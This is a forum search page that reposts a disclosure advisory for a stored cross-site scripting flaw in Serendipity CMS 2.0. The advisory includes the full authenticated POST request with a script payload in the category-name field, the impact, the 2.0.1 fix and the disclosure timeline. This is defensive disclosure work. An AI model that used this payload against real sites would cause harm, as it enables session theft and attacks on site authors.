Jump to content

Search the Community

Showing results for tags 'serendipity'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. Serendipity CMS - XSS Vulnerability in Version 2.0 ---------------------------------------------------------------- Product Information: Software: Serendipity CMS Tested Version: 2.0, released 23.1.2015 Vulnerability Type: Cross-Site Scripting (CWE-79) Download link: http://www.s9y.org/12.html Description: Serendipity is aimed to make everything possible you ever wish for. It is technically up to par to other well-known weblog scripts like Moveable Type or Wordpress. (copied from http://www.s9y.org/3.html) ---------------------------------------------------------------- Vulnerability description: XSS is found in category creation page. When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server: POST /serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1 Host: 127.0.0.1 Proxy-Connection: keep-alive Content-Length: 394 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: serendipity[old_session]=q8jagkbn03i41p1hea1vp3mqi7; serendipity[author_token]=906de2dd7201b75f1f710f59128e1ffb5cec6cf4; serendipity[userDefLang]=en; serendipity[toggle_extended]=true; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage] serendipity[sortorder_order] serendipity[sortorder_ordermode] serendipity[only_path] serendipity[only_filename] serendipity[entrylist_filter_author] serendipity[entrylist_filter_category] serendipity[entrylist_filter_isdraft] serendipity[entrylist_sort_perPage] serendipity[entrylist_sort_ordermode] serendipity[entrylist_sort_order] s9y_f857b4bc988a333c379a2d9bd477dd65=q8jagkbn03i41p1hea1vp3mqi7 serendipity%5Btoken%5D=b95339bd8490707038719715c6d58e63&serendipity%5Bcat%5D%5Bname%5D=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&serendipity%5Bcat%5D%5Bdescription%5D=&serendipity%5Bcat%5D%5Bparent_cat%5D=0&serendipity%5Bcat%5D%5Bhide_sub%5D=0&serendipity%5Bcat%5D%5Bread_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bwrite_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bicon%5D=&SAVE=Create The parameter serendipity[cat][name] is vulnerable to XSS. The payload is executed when an authenticated user navigates to the "New Entry" page. ---------------------------------------------------------------- Impact: An attacker is able to leverage on the XSS vulnerability to exploit content creator of Serendipity CMS. An example would be to inject malicious JavaScript code in order to use attacking tools like BeEF. ---------------------------------------------------------------- Solution: Update to the latest version, which is 2.0.1, see http://blog.s9y.org/archives/263-Serendipity-2.0.1-released.html ---------------------------------------------------------------- Timeline: Vulnerability found: 12.3.2015 Vendor informed: 12.3.2015 Response by vendor: 12.3.2015 Fix by vendor 12.3.2015 Public Advisory: 13.3.2015 ---------------------------------------------------------------- Reference: https://github.com/s9y/Serendipity/commit/a30886d3bb9d8eeb6698948864c77caaa982435d ---------------------------------------------------------------- Best regards, Edric Teo Source
×
×
  • Create New...